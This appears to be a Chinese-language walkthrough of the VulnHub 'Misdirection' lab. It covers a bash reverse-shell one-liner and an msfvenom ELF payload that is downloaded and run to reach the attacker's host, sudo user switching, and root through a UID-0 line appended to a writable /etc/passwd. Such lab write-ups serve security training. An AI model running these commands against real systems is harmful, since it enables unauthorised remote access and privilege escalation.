vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

admin 2024年2月7日09:01:59评论16 views字数 1485阅读4分57秒阅读模式

目录

  • 一、信息收集
  • 二、web渗透
  • 三、反弹shell
  • 四、用户提权
  • 五、root提权

一、信息收集

拿到靶机后,老规矩,使用nmap进行详细扫描,这里我的kali本机ip是192.168.138.133

先扫描ip网段,252则是靶机ip

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

接着是靶机的端口

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

信息收集到这里我的大概思路就是在页面中寻找有用信息,后通过mysql连接数据库或者使用sqlmap爆破获取用户信息

接下来是对靶机端口详细扫描

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

还有靶机漏洞扫描,这里扫描出来的一些目录对我们打靶有很大的帮助

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

这里8080端口里面的目录一会对于渗透有很大的帮助

既然有80和8080端口,肯定少不了目录扫描,这里使用dirsearch对靶机进行目录扫描

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

二、web渗透

这里扫描完成后发现了不对劲,扫出来的目录太多了,去页面上看看

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

这里不好获取信息,后来我去登录注册页面尝试以后也没有发现sql注入

这是我联想到了靶机名称就是misdirection,这个80页面的信息可能在误导我们,然后我就去尝试nmap漏洞扫描的漏洞,发现8080端口下的/debug是一个页面shell

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

这就好办了,通过这个页面我们可以获得反弹shell,这里有两个方式获取反弹shell

三、反弹shell

1.在页面中输入 /bin/bash -c ‘bash -i >& /dev/tvp/192.168.138.133/1234 0>&1’

然后在kali本机上nc -lvnp 1234即可获得反弹shell

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

2. 在kali上使用msf制作脚本,然后开启http服务,后在页面上wget拉取脚本,赋予执行权限,kali上nc监听,即可获得反弹shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.138.133 LPORT=53 -f elf > shell.elf

python3 -m http.server

wget 192.168.138.133:8000/shell.elf

chmod +x shell.elf赋予执行权限

nc -lvnp 53 先在kali上进行nc监听,再执行脚本

./shell.elf

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

然后拉取shell文件,并赋予执行权限,在kali上监听,再执行文件,即可获得反弹shell

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

获得shell后输入python -c 'import pty;pty.spawn("/bin/bash")' 获取交互式shell

四、用户提权

拿到shell后sudo -l发现可以拿到用户brexit的shell

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

我们cat /etc/passwd 发现brexit用户为1000

可以输入sudo -u#1000 /bin/bash 或者 sudo -u brexit /bin/bash 获取brexit权限

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

五、root提权

进入brexit用户后sudo -l命令需要密码,但是刚才我们查看passwd权限时,发现用户组是brexit,且具有读写权限

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

这就好办了,我们可以通过修改或者添加用户来提权,这里我用openssh生成密码,创建新用户输入到/etc/passwd里面

这里使用openssl生成密码1

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

openssh passwd -1 "1"

echo 'k1:$1$wPgAKbbR$Fz3jjvbnZmdaOpA7DvJj0/:0:0:root:/root:/bin/bash' >> /etc/passwd

vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

输入到/etc/passwd里面,su k1即刚才我们创建的用户,输入密码,成功获取root权限

本文作者:K____k, 转载请注明来自FreeBuf.COM

原文始发于微信公众号(Hacking黑白红):vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月7日09:01:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之Misdirection靶机渗透(web渗透、反弹shell、提权)http://cn-sec.com/archives/2477373.html

发表评论

匿名网友 填写信息